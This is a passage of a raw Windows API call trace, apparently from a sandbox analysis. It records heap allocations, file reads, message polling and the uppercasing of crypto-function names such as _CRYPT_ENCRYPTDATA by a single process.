RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0081.731] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0081.732] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0081.732] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0081.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0081.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0081.736] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0081.736] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0081.739] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x6ee0, lpOverlapped=0x0) returned 1 [0081.739] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0081.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ee0) returned 0x499a008 [0081.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0081.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0081.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0081.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ee0) returned 0x49b0ef0 [0081.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0081.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.748] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0081.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ee0) returned 0x499a008 [0081.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0081.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0081.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.749] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0081.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0081.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0081.749] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0081.749] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0081.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0081.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2950 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0081.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ee0) returned 0x499a008 [0081.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0081.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0081.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2af0 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb1e0 [0081.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0081.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0081.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ee0) returned 0x49c7dd8 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0081.753] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0081.753] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0081.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0081.754] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0081.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0081.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ad0 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2a0 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.754] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0081.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.755] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.756] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0081.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0081.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2d0 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0081.756] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0081.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0081.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.758] RtlAllocateHeap 